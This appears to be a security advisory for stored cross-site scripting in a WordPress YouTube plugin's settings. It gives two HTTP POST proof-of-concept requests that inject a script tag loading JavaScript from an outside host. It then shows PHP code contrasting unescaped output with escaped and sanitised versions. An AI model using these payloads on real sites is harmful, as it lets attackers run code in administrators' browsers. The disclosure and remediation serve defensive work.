The plugin did not sanitise or escape its lyte_yt_api_key and lyte_notification settings before outputting them back into the page, allowing high-privilege users to store an XSS payload in them and leading to stored Cross-Site Scripting issues.
PoC #1 | Authenticated Persistent XSS | Your YouTube API key:

POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=&lyte_yt_api_key=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0

PoC #2 | Authenticated Persistent XSS | lyte_notification:

POST /wp-admin/options.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 940

option_page=lyte-settings-group&action=update&_wpnonce=79504d5c99&_wp_http_referer=&lyte_notification=%22%3E%3Cscript+src%3D%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3Cdiv+x&lyte_yt_api_key=&lyte_size=0&lyte_show_links=0&lyte_position=0&lyte_hidef=0&lyte_microdata=0&lyte_greedy=0&lyte_local_thumb=0&lyte_disclaimer=0
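The root cause described above, as an added PHP illustration that is not the plugin's own code: a hypothetical settings-page fragment showing the unescaped output beside the escaped version, plus a sanitize_callback on the registered options. The function names and rendering structure are assumptions; only the option names and the settings group come from the PoC.

```php
<?php
// Hypothetical reconstruction of the bug class, not code from the WP YouTube Lyte plugin.

// VULNERABLE: the stored option is concatenated straight into an HTML attribute.
// A value beginning with "> closes the attribute and the rest is parsed as markup,
// which is exactly what the PoC payloads rely on.
function lyte_render_key_field_vulnerable() {
    $value = get_option( 'lyte_yt_api_key', '' );
    return '<input type="text" name="lyte_yt_api_key" value="' . $value . '">';
}

// HARDENED: escape on output. esc_attr() encodes ", ', <, > and &, so the
// browser sees the payload as literal attribute text, never as a tag.
function lyte_render_key_field_hardened() {
    $value = get_option( 'lyte_yt_api_key', '' );
    return '<input type="text" name="lyte_yt_api_key" value="' . esc_attr( $value ) . '">';
}

// Same pattern for the notification text, which is emitted as element content
// rather than an attribute, so esc_html() is the matching context-specific escape.
function lyte_render_notification_hardened() {
    return '<p class="lyte-notice">' . esc_html( get_option( 'lyte_notification', '' ) ) . '</p>';
}

// Defence in depth: sanitise on input as well, so the database never holds
// markup even if a later template forgets to escape. register_setting() with a
// sanitize_callback runs for every save through /wp-admin/options.php.
add_action( 'admin_init', function () {
    register_setting( 'lyte-settings-group', 'lyte_yt_api_key', array(
        'type'              => 'string',
        'sanitize_callback' => 'sanitize_text_field', // strips tags, keeps a plain API key intact
    ) );
    register_setting( 'lyte-settings-group', 'lyte_notification', array(
        'type'              => 'string',
        'sanitize_callback' => 'sanitize_text_field', // assumption: the notice is plain text
    ) );
} );
```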
m0ze
m0ze
Yes
2021-06-16 (about 1 year ago)
2021-06-16 (about 1 year ago)
2021-06-25 (about 1 year ago)